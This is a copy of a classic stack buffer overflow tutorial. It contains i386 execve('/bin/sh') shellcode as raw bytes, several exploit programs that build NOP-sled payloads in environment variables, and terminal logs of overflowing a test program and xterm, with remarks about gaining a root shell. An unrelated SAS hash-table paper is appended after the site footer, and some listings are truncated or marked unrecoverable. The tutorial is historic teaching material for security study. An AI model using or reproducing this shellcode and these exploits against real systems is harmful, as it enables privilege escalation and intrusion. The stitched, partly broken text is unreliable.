GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x800034c <_exit>:      pushl  %ebp
0x800034d <_exit+1>:    movl   %esp,%ebp
0x800034f <_exit+3>:    pushl  %ebx
0x8000350 <_exit+4>:    movl   $0x1,%eax
```

The exit syscall will place 0x1 in EAX, place the exit code in EBX, and execute "int 0x80". That's it. Most applications return 0 on exit to indicate no errors. We will place 0 in EBX. Our list of steps is now:

a. Have the null terminated string "/bin/sh" somewhere in memory.
b. Have the address of the string "/bin/sh" somewhere in memory followed by a null long word.
c. Copy 0xb into the EAX register.
d. Copy the address of the string "/bin/sh" into the EBX register.
e. Copy the address of the address of the string "/bin/sh" into the ECX register.
f. Copy the address of the null long word into the EDX register.
g. Execute the int $0x80 instruction.
h. Copy 0x1 into the EAX register.
i. Copy 0x0 into the EBX register.
j. Execute the int $0x80 instruction.
Trying to put this together in assembly language, placing the string after the code, and remembering we will place the address of the string and a null word after the array, we have:

```
        movl   string_addr,string_addr_addr
        movb   $0x0,null_byte_addr
        movl   $0x0,null_addr
        movl   $0xb,%eax
        movl   string_addr,%ebx
        leal   string_addr,%ecx
        leal   null_string,%edx
        int    $0x80
        movl   $0x1, %eax
        movl   $0x0, %ebx
        int    $0x80
        /bin/sh string goes here.
```

The problem is that we don't know where in the memory space of the program we are trying to exploit the code (and the string that follows it) will be placed. One way around it is to use a JMP and a CALL instruction. The JMP and CALL instructions can use IP relative addressing, which means we can jump to an offset from the current IP without needing to know the exact address of where in memory we want to jump to. If we place a CALL instruction right before the "/bin/sh" string, and a JMP instruction to it, the string's address will be pushed onto the stack as the return address when CALL is executed. All we need then is to copy the return address into a register. The CALL instruction can simply call the start of our code above.
Assuming now that J stands for the JMP instruction, C for the CALL instruction, and s for the string, the execution flow would now be:

```
bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF  top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF  memory
           buffer                sfp   ret   a     b     c
<------   [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]
           ^|^             ^|           |
           |||_____________||           |   (1) JMP forward to the CALL
           ||_______________|           |   (2) CALL back to the popl
           |____________________________|   (3) saved RET points into the buffer

top of                                                         bottom of
stack                                                              stack
```

With these modifications, using indexed addressing, and writing down how many bytes each instruction takes, our code looks like:

```
        jmp    offset-to-call            # 2 bytes
        popl   %esi                      # 1 byte
        movl   %esi,array-offset(%esi)   # 3 bytes
        movb   $0x0,nullbyteoffset(%esi) # 4 bytes
        movl   $0x0,null-offset(%esi)    # 7 bytes
        movl   $0xb,%eax                 # 5 bytes
        movl   %esi,%ebx                 # 2 bytes
        leal   array-offset(%esi),%ecx   # 3 bytes
        leal   null-offset(%esi),%edx    # 3 bytes
        int    $0x80                     # 2 bytes
        movl   $0x1, %eax                # 5 bytes
        movl   $0x0, %ebx                # 5 bytes
        int    $0x80                     # 2 bytes
        call   offset-to-popl            # 5 bytes
        /bin/sh string goes here.
```

Calculating the offsets from jmp to call, from call to popl, from the string address to the array, and from the string address to the null long word, we now have:

```
        jmp    0x26                      # 2 bytes
        popl   %esi                      # 1 byte
        movl   %esi,0x8(%esi)            # 3 bytes
        movb   $0x0,0x7(%esi)            # 4 bytes
        movl   $0x0,0xc(%esi)            # 7 bytes
        movl   $0xb,%eax                 # 5 bytes
```

Looks good. To make sure it works correctly we must compile it and run it. But there is a problem. Our code modifies itself, but most operating systems mark code pages read-only. To get around this restriction we must place the code we wish to execute in the stack or data segment, and transfer control to it. To do so we will place our code in a global array in the data segment. We need first a hex representation of the binary code. Let's compile it first, and then use gdb to obtain it.
shellcodeasm.c:

```c
void main() {
__asm__("
        jmp    0x2a
        popl   %esi
        movl   %esi,0x8(%esi)
        movb   $0x0,0x7(%esi)
        movl   $0x0,0xc(%esi)
        movl   $0xb,%eax
        movl   %esi,%ebx
        leal   0x8(%esi),%ecx
        leal   0xc(%esi),%edx
        int    $0x80
        movl   $0x1, %eax
        movl   $0x0, %ebx
        int    $0x80
        call   -0x2b
        .string \"/bin/sh\"
");
}
```

```
[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c
[aleph1]$ gdb shellcodeasm
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>:       pushl  %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     jmp    0x800015f <main+47>
0x8000135 <main+5>:     popl   %esi
```

It works! But there is an obstacle. In most cases we'll be trying to overflow a character buffer. As such any null bytes in our shellcode will be considered the end of the string, and the copy will be terminated. There must be no null bytes in the shellcode for the exploit to work. Let's try to eliminate the null bytes (and at the same time make it smaller).
```
Problem instruction:                 Substitute with:
--------------------------------------------------------
movb   $0x0,0x7(%esi)                xorl   %eax,%eax
movl   $0x0,0xc(%esi)                movb   %eax,0x7(%esi)
                                     movl   %eax,0xc(%esi)
--------------------------------------------------------
movl   $0xb,%eax                     movb   $0xb,%al
--------------------------------------------------------
movl   $0x1, %eax                    xorl   %ebx,%ebx
movl   $0x0, %ebx                    movl   %ebx,%eax
                                     inc    %eax
--------------------------------------------------------
```

Our improved code:

shellcodeasm2.c:

```
void main() {
__asm__("
        jmp    0x1f                      # 2 bytes
        popl   %esi                      # 1 byte
        movl   %esi,0x8(%esi)            # 3 bytes
        xorl   %eax,%eax                 # 2 bytes
        movb   %eax,0x7(%esi)            # 3 bytes
        movl   %eax,0xc(%esi)            # 3 bytes
        movb   $0xb,%al                  # 2 bytes
        movl   %esi,%ebx                 # 2 bytes
        leal   0x8(%esi),%ecx            # 3 bytes
        leal   0xc(%esi),%edx            # 3 bytes
        int    $0x80                     # 2 bytes
        xorl   %ebx,%ebx                 # 2 bytes
        movl   %ebx,%eax                 # 2 bytes
        inc    %eax                      # 1 byte
        int    $0x80                     # 2 bytes
        call   -0x24                     # 5 bytes
        .string \"/bin/sh\"              # 8 bytes
");
}
```

And our new test program:

testsc2.c:

```
char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

void main() {
  int *ret;

  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}
```

```
[aleph1]$ gcc -o testsc2 testsc2.c
[aleph1]$ ./testsc2
$ exit
[aleph1]$
```

**WRITING AN EXPLOIT (OR HOW TO MUNG THE STACK)**

Let's try to pull all our pieces together. We have the shellcode. We know it must be part of the string which we'll use to overflow the buffer. We know we must point the return address back into the buffer.
This example will demonstrate these points:

overflow1.c:

```
#include <string.h>

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char large_string[128];

void main() {
  char buffer[96];
  int i;
  long *long_ptr = (long *) large_string;

  for (i = 0; i < 32; i++)
    *(long_ptr + i) = (int) buffer;

  for (i = 0; i < strlen(shellcode); i++)
    large_string[i] = shellcode[i];

  strcpy(buffer,large_string);
}
```

```
[aleph1]$ gcc -o overflow1 overflow1.c
[aleph1]$ ./overflow1
$ exit
[aleph1]$
```

What we have done above is filled the array large_string[] with the address of buffer[], which is where our code will be. Then we copy our shellcode into the beginning of the large_string string. strcpy() will then copy large_string onto buffer without doing any bounds checking, and will overflow the return address, overwriting it with the address where our code is now located. Once we reach the end of main and it tries to return, it jumps to our code, and execs a shell.

The problem we are faced with when trying to overflow the buffer of another program is trying to figure out at what address the buffer (and thus our code) will be. The answer is that for every program the stack will start at the same address. Most programs do not push more than a few hundred or a few thousand bytes into the stack at any one time. Therefore by knowing where the stack starts we can try to guess where the buffer we are trying to overflow will be.
Here is a little program that will print its stack pointer:

sp.c:

```c
unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main() {
  printf("0x%x\n", get_sp());
}
```

```
[aleph1]$ ./sp
0x8000470
[aleph1]$
```

Let's assume this is the program we are trying to overflow:

vulnerable.c:

```c
void main(int argc, char *argv[]) {
  char buffer[512];

  if (argc > 1)
    strcpy(buffer, argv[1]);
}
```

We can create a program that takes as a parameter a buffer size, and an offset from its own stack pointer (where we believe the buffer we want to overflow may live). We'll put the overflow string in an environment variable so it is easy to manipulate:

exploit2.c:

```c
#include <stdlib.h>

#define DEFAULT_OFFSET          0
#define DEFAULT_BUFFER_SIZE   512

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr += 4;
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  memcpy(buff,"EGG=",4);
  putenv(buff);
  system("/bin/bash");
}
```

Now we can try to guess what the buffer address and offset should be:

```
[aleph1]$ ./exploit2 500
Using address: 0xbfffffd4
[aleph1]$ ./vulnerable $EGG
[aleph1]$ exit
[aleph1]$ ./exploit2 600
Using address: 0xbfffffd4
[aleph1]$ ./vulnerable $EGG
Illegal instruction
[aleph1]$ exit
[aleph1]$ ./exploit2 600 100
```

As we can see this is not an efficient process. Trying to guess the offset even while knowing where the beginning of the stack lives is nearly impossible. We would need at best a hundred tries, and at worst a couple of thousand.
The problem is we need to guess *exactly* where the address of our code will start. If we are off by one byte more or less we will just get a segmentation violation or an invalid instruction. One way to increase our chances is to pad the front of our overflow buffer with NOP instructions. Almost all processors have a NOP instruction that performs a null operation. It is usually used to delay execution for purposes of timing. We will take advantage of it and fill half of our overflow buffer with them. We will place our shellcode at the center, and then follow it with the return addresses. If we are lucky and the return address points anywhere in the string of NOPs, they will just get executed until they reach our code. In the Intel architecture the NOP instruction is one byte long and it translates to 0x90 in machine code.

Assuming the stack starts at address 0xFF, that S stands for shellcode, and that N stands for a NOP instruction, the new stack would look like this:

```
bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF  top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF  memory
           buffer                sfp   ret   a     b     c
<------   [NNNNNNNNNNNSSSSSSSSS][0xDE][0xDE][0xDE][0xDE][0xDE]
               ^                        |
               |________________________|

top of                                                         bottom of
stack                                                              stack
```

The new exploit is then:

exploit3.c:

```c
#include <stdlib.h>

#define DEFAULT_OFFSET          0
#define DEFAULT_BUFFER_SIZE   512
#define NOP                  0x90

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  memcpy(buff,"EGG=",4);
  putenv(buff);
  system("/bin/bash");
}
```

A good selection for our buffer size is about 100 bytes more than the size of the buffer we are trying to overflow. This will place our code at the end of the buffer we are trying to overflow, giving a lot of space for the NOPs, but still overwriting the return address with the address we guessed. The buffer we are trying to overflow is 512 bytes long, so we'll use 612. Let's try to overflow our test program with our new exploit:

```
[aleph1]$ ./exploit3 612
```

Whoa! First try! This change has improved our chances a hundredfold. Let's try it now on a real case of a buffer overflow. We'll use for our demonstration the buffer overflow on the Xt library. For our example, we'll use xterm (all programs linked with the Xt library are vulnerable). You must be running an X server and allow connections to it from the localhost. Set your DISPLAY variable accordingly.

```
[aleph1]$ export DISPLAY=:0.0
[aleph1]$ ./exploit3 1124
Using address: 0xbffffd48
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "â^1=FF
^C
[aleph1]$ exit
[aleph1]$ ./exploit3 2148 100
Using address: 0xbffffd48
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "â^1=FF
Warning: some arguments in previous message were lost
Illegal instruction
[aleph1]$ exit
```
```
[a4]$ ./exploit3 2148 600
Using address: 0xbffffb54
[a4]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "ë^1¤FF 0V =a@=eUyy/bin/sh@y@Tqy@Tqy@Tqy@Tqy@Tqy ... @Tqy@
```

Eureka! Less than a dozen tries and we found the magic numbers. If xterm were installed suid root this would now be a root shell.

**SMALL BUFFER OVERFLOWS**

There will be times when the buffer you are trying to overflow is so small that either the shellcode won't fit into it (and it will overwrite the return address with instructions instead of the address of our code), or the number of NOPs you can pad the front of the string with is so small that the chances of guessing their address are minuscule. To obtain a shell from these programs we will have to go about it another way. This particular approach only works when you have access to the program's environment variables.

What we will do is place our shellcode in an environment variable, and then overflow the buffer with the address of this variable in memory. This method also increases your chances of the exploit working, as you can make the environment variable holding the shellcode as large as you want.

The environment variables are stored at the top of the stack when the program is started; any modifications made with setenv() are then allocated elsewhere.
The stack at the beginning then looks like this:

```
<strings><argv pointers>NULL<envp pointers>NULL<argc><argv><envp>
```

Our new program will take an extra variable, the size of the variable containing the shellcode and NOPs. Our new exploit now looks like this:

```c
#include <stdlib.h>

#define DEFAULT_OFFSET          0
#define DEFAULT_BUFFER_SIZE   512
#define DEFAULT_EGG_SIZE     2048
#define NOP                  0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;

  if (argc > 1) bsize   = atoi(argv[1]);
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_esp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  memcpy(egg,"EGG=",4);
  putenv(egg);
  memcpy(buff,"RET=",4);
  putenv(buff);
  system("/bin/bash");
}
```

Let's try our new exploit with our vulnerable test program:

```
[aleph1]$ ./exploit4 768
Using address: 0xbfffffd0
[aleph1]$ ./vulnerable $RET
$
```

Works like a charm.
Now let's try it on xterm:

```
[aleph1]$ export DISPLAY=:0.0
[aleph1]$ ./exploit4 2148
Using address: 0xbfffffd0
[aleph1]$ /usr/X11R6/bin/xterm -fg $RET
Warning: Color name
Warning: some arguments in previous message were lost
```

On the first try! It has certainly increased our odds. Depending on how much environment data the exploit program has compared with the program you are trying to exploit, the guessed address may be too low or too high. Experiment with both positive and negative offsets.

**FINDING BUFFER OVERFLOWS**

As stated earlier, buffer overflows are the result of stuffing more information into a buffer than it is meant to hold. Since C does not have any built-in bounds checking, overflows often manifest themselves as writing past the end of a character array.

The standard C library provides a number of functions for copying or appending strings that perform no boundary checking. They include: strcat(), strcpy(), sprintf(), and vsprintf(). These functions operate on null-terminated strings and do not check for overflow of the receiving string. gets() is a function that reads a line from stdin into a buffer until either a terminating newline or EOF. It performs no checks for buffer overflows. The scanf() family of functions can also be a problem if you are matching a sequence of non-white-space characters (%s), or matching a non-empty sequence of characters from a specified set (%[]), and the array pointed to by the char pointer is not large enough to accept the whole sequence of characters, and you have not defined the optional maximum field width. If the target of any of these functions is a buffer of static size, and its other argument was somehow derived from user input, there is a good possibility that you might be able to exploit a buffer overflow.
Another usual programming construct we find is the use of a while loop to read one character at a time into a buffer from stdin or some file until the end of line, end of file, or some other delimiter is reached. This type of construct usually uses one of these functions: getc(), fgetc(), or getchar(). If there are no explicit checks for overflows in the while loop, such programs are easily exploited.

To conclude, grep(1) is your friend. The sources for free operating systems and their utilities are readily available. This fact becomes quite interesting once you realize that many commercial operating system utilities were derived from the same sources as the free ones. Use the source d00d.

**APPENDIX A - SHELLCODE FOR DIFFERENT OPERATING SYSTEMS/ARCHITECTURES**

i386/Linux

```assembly
        jmp     0x1f
        popl    %esi
        movl    %esi, 0x8(%esi)
        xorl    %eax, %eax
        movb    %eax, 0x7(%esi)
        movl    %eax, 0xc(%esi)
        movb    $0xb, %al
        movl    %esi, %ebx
        leal    0x8(%esi), %ecx
        leal    0xc(%esi), %edx
        int     $0x80
        xorl    %ebx, %ebx
        movl    %ebx, %eax
        inc     %eax
        int     $0x80
        call    -0x24
        .string "/bin/sh"
```

SPARC/Solaris

```assembly
        sethi   0xbd89a, %l6
        or      %l6, 0x16e, %l6
        sethi   0xbdcda, %l7
        and     %sp, %sp, %o0
        add     %sp, 8, %o1
        xor     %o2, %o2, %o2
        add     %sp, 16, %sp
        std     %l6, [%sp - 16]
        st      %sp, [%sp - 8]
        st      %g0, [%sp - 4]
        mov     0x3b, %g1
        ta      8
        xor     %o7, %o7, %o0
        mov     1, %g1
        ta      8
```

SPARC/SunOS

```assembly
        sethi   0xbd89a, %l6
        or      %l6, 0x16e, %l6
        sethi   0xbdcda, %l7
        and     %sp, %sp, %o0
        add     %sp, 8, %o1
        xor     %o2, %o2, %o2
        add     %sp, 16, %sp
        std     %l6, [%sp - 16]
        st      %sp, [%sp - 8]
        st      %g0, [%sp - 4]
        mov     0x3b, %g1
        mov     -0x1, %l5
        ta      %l5 + 1
        xor     %o7, %o7, %o0
        mov     1, %g1
        ta      %l5 + 1
```

**APPENDIX B - GENERIC BUFFER OVERFLOW PROGRAM**

shellcode.h

```c
#if defined(__i386__) && defined(__linux__)

#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp, %eax");
}

#elif defined(__sparc__) && defined(__sun__) && defined(__svr4__)

#define NOP_SIZE 4
/* SPARC/Solaris nop[] and shellcode[] byte strings not recoverable from this copy */

unsigned long get_sp(void) {
   __asm__("or %sp, %sp, %i0");
}

#elif defined(__sparc__) && defined(__sun__)

#define NOP_SIZE 4
/* SPARC/SunOS nop[] and shellcode[] byte strings not recoverable from this copy */

unsigned long get_sp(void) {
   __asm__("or %sp, %sp, %i0");
}

#endif
```
eggshell.c

```c
/**********************************************************
 * eggshell v1.0
 * Aleph One / aleph1@underground.org
 **********************************************************/
#include <stdlib.h>
#include <stdio.h>
#include "shellcode.h"

#define DEFAULT_OFFSET          0
#define DEFAULT_BUFFER_SIZE   512
#define DEFAULT_EGG_SIZE     2048

void usage(void);

void main(int argc, char *argv[]) {
  char *ptr, *bof, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, n, m, c, align=0, eggsize=DEFAULT_EGG_SIZE;

  while ((c = getopt(argc, argv, "a:b:e:o:")) != EOF)
    switch (c) {
      case 'a': align   = atoi(optarg); break;
      case 'b': bsize   = atoi(optarg); break;
      case 'e': eggsize = atoi(optarg); break;
      case 'o': offset  = atoi(optarg); break;
      case '?': usage(); exit(0);
    }

  if (strlen(shellcode) > eggsize) {
    printf("Shellcode is larger than the egg.\n");
    exit(0);
  }

  if (!(bof = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  printf("[ Buffer size:\t%d\t\tEgg size:\t%d\tAlignment:\t%d\t]\n",
         bsize, eggsize, align);
  printf("[ Address:\t0x%x\tOffset:\t%d\t]\n", addr, offset);

  addr_ptr = (long *) bof;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr = egg;
  for (i = 0; i <= eggsize - strlen(shellcode) - NOP_SIZE; i += NOP_SIZE)
    for (n = 0; n < NOP_SIZE; n++) {
      m = (n + align) % NOP_SIZE;
      *(ptr++) = nop[m];
    }

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  bof[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  memcpy(egg,"EGG=",4);
  putenv(egg);
  memcpy(bof,"BOF=",4);
  putenv(bof);
  system("/bin/sh");
}

void usage(void) {
  (void)fprintf(stderr,
    "usage: eggshell [-a <alignment>] [-b <buffersize>] [-e <eggsize>] [-o <offset>]\n");
}
```

===============================================================================

[Back to the Reactor Core]

Verily I say unto you, Inasmuch as ye have done it unto one of the least of these my brethren, ye have done
it unto me. (Matthew 25:40)

This document is provided for reference purposes only. Statements in this document reflect the opinions of Reactor Core staff or the owner. If you find aught to disagree with, that is as it ought be. Train your mind to test every thought, ideology, train of reason and claim to truth. There is no justice when even a single voice goes unheard. (1 Thessalonians 5:21, 1 John 4:1-3, John 14:26, John 16:26, Revelation 12:10, Proverbs 14:15, Proverbs 18:13)

Ad Dei Gloriam
How Do I Love Hash Tables? Let Me Count The Ways! Judy Loren, Health Dialog Analytic Solutions, Portland, ME ABSTRACT I love hash tables. You will, too, after you see what they can do. This paper will start with the classic 2 table join. Nothing new, you say? But this version does it in one step without sorting. And, it's the fastest method around. Next, you will see the use of hash tables to join multiple datasets on different keys in one pass, again with no sorting. How about unlimited recursive chained lookups (like when you need to update an ID through as many incarnations as it may have had)? Hash tables solve that one, too. And before you catch your breath, you'll see how to create n datasets from one (or more), where n is determined (at runtime) by the number of values encountered in a variable. No muss, no fuss. One step (well, OK, this one does require a prior sort) and you're done. We'll wind up with an outer join, just to show that hash tables can do that, too. Take a look at what they can deliver, and you'll be counting the ways you love hash tables before the year is out. INTRODUCTION This paper is not a reference document on hash tables, nor an explanation of how they work. Both of those have been done better than I could do them by experts in the field (see References for a paper on the subject by Paul Dorfman). This paper is more of an homage to Paul and to the power of hash tables. It shows a variety of situations, fairly common among data processors, in which hash tables are an excellent, if not the best, solution. That said, people who learn best by example will find this paper a good training tool. If you can identify with at least one of the specific examples, and begin to apply it in your work, you will have a basis for understanding the theoretical underpinnings of the technique and can then expand your usage to other applications. WHAT ARE HASH TABLES? 
For those who want it straight from the horse's mouth, here is a blurb from the SAS online documentation:

SAS now provides two pre-defined component objects for use in a DATA step: the hash object and the hash iterator object. These objects enable you to quickly and efficiently store, search, and retrieve data based on lookup keys. The DATA step component object interface enables you to create and manipulate these component objects by using statements, attributes, and methods. You use the DATA step object dot notation to access the component object's attributes and methods. The hash and hash iterator objects have one attribute, fourteen methods, and two statements associated with them. See DATA Step Object Attributes and Methods.

Search the online documentation for the phrase "DATA Step Object Attributes and Methods" for the rest of the story.

Briefly, hash tables, much like arrays, are Data step constructs. A hash table is declared and used within one Data step, and it disappears when the Data step completes. Also like arrays, hash tables are accessed via an index. But unlike arrays, the index consists of a lookup key defined by the user rather than a simple sequential variable. Also, one hash table can contain multiple data elements (a bit like a series of arrays). Because the lookup keys are based on the values themselves, access is extremely efficient. SAS does the work of building this efficiency so the user does not have to code anything other than identifying the key fields to use.

Hash tables are objects, so you call methods to use them. The syntax of calling a method is to put the name of the hash table, then a dot (.), then the method you want to use. Following the method is a set of parentheses in which you put the specifications for the method. You will see this kind of syntax in the statement below:

plan.DefineKey('plan_id');

In this case, Plan is the name of the hash table.
DefineKey is the method and 'plan_id' is a specification expected by the method DefineKey (analogous to a positional parameter on a macro call). A method can be called using the following expanded syntax:

rc = plan.definekey('plan_id');

In this case, the variable rc is specified by the user to contain the feedback from executing the method. If the instruction plan.definekey('plan_id') executes successfully, rc will contain a value of zero. If not, the value of rc will be something other than zero.

A note about the term associativearray: While it can be used to declare a hash table, it will not work with the iterator. Not all hash applications require an iterator, but since the term "hash" is shorter to type and works with the iterator, it seems like a good idea to get in the habit of using it instead.

Now, without further ado, on to the first example.

**EXAMPLE 1: JOIN 2 DATASETS (WITHOUT SORTING)**

Imagine that you have 2 datasets and you need to join them on a key. Let us consider the following case:

Members:
<table>
<thead> <tr> <th>Member_id</th> <th>Plan_id</th> </tr> </thead>
<tbody>
<tr> <td>164-234</td> <td>XYZ</td> </tr>
<tr> <td>297-123</td> <td>ABC</td> </tr>
<tr> <td>344-123</td> <td>JKL</td> </tr>
<tr> <td>395-123</td> <td>XYZ</td> </tr>
<tr> <td>495-987</td> <td>ABC</td> </tr>
<tr> <td>562-987</td> <td>ABC</td> </tr>
<tr> <td>697-123</td> <td>XYZ</td> </tr>
<tr> <td>833-144</td> <td>JKL</td> </tr>
<tr> <td>987-123</td> <td>ABC</td> </tr>
</tbody>
</table>

Plans:
<table>
<thead> <tr> <th>Plan_id</th> <th>Plan_desc</th> </tr> </thead>
<tbody>
<tr> <td>XYZ</td> <td>HMO Salaried</td> </tr>
<tr> <td>ABC</td> <td>PPO Hourly</td> </tr>
<tr> <td>JKL</td> <td>HMO Executive</td> </tr>
</tbody>
</table>

You are faced with the straightforward task of adding the Plan_desc to the Members dataset by matching the values in the column Plan_ID on the Members table to the
Plan_ID on the Plans table. Before hash tables, you might have used a proc sort and a data step. This would involve sorting the Members dataset, which might be very large, on a variable that is unlikely to be the desired final sort key—a waste of time and resources. There are other solutions (see Loren, 2005) but the purpose of this paper is to introduce you to hash tables in a simple setting. This example does not highlight the reason for using hash tables but it does show how to use them. APPROACH As shown in the code below, we accomplish the task in one Data step. First we load the data from the Plans dataset into a hash table. We then process the Members data (in whatever order we happen to find it), looking up the value for the Plan_desc variable from the hash table for each record. The .find() method with no modifier uses the current value of the key variable Plan_id in the program data vector to identify the desired row in the hash table. It then puts the values of the field(s) listed in the .DefineData() method (in this case, Plan_desc) from the identified row in the hash table into the variable(s) of the same name (Plan_desc) in the program data vector, making it available for output. When we output the record to the dataset called Both, it will contain all the variables from the Members dataset plus the Plan_desc. A note on error handling: In the code below, you see that we are initializing Plan_desc to missing immediately before attempting to read the hash table to pull in the Plan_desc for the current value of Plan_id. The purpose of this is to prepare for the case where the value of Plan_id from the members table does not exist in the dataset plans, and therefore will not be found on any row of the hash table. There are other methods of detecting and handling this that will be introduced below. 
Here we assume that the user wants all records from members in the dataset both, even if the value of Plan_id does not exist in the dataset Plans; in that case, the user wants the Plan_desc to be missing. Here is the code:

```plaintext
data both (drop=rc);
  declare hash Plan ();                 /* declare the name Plan for hash */
  rc = plan.DefineKey ('Plan_id');      /* identify fields to use as keys */
  rc = plan.DefineData ('Plan_desc');   /* identify fields to use as data */
  rc = plan.DefineDone ();              /* complete hash table definition */

  do until (eof1);
    set plans end = eof1;
    rc = plan.add ();
  end;

  do until (eof2);
    set members end = eof2;
    call missing(Plan_desc);   /* initialize the variable we intend to fill */
    rc = plan.find ();
    output;
  end;
  stop;
run;
```

The resulting dataset looks like this:

<table>
<thead> <tr> <th>Obs</th> <th>Plan_id</th> <th>Plan_desc</th> <th>Member_id</th> </tr> </thead>
<tbody>
<tr> <td>1</td> <td>XYZ</td> <td>HMO Salaried</td> <td>164-234</td> </tr>
<tr> <td>2</td> <td>ABC</td> <td>PPO Hourly</td> <td>297-123</td> </tr>
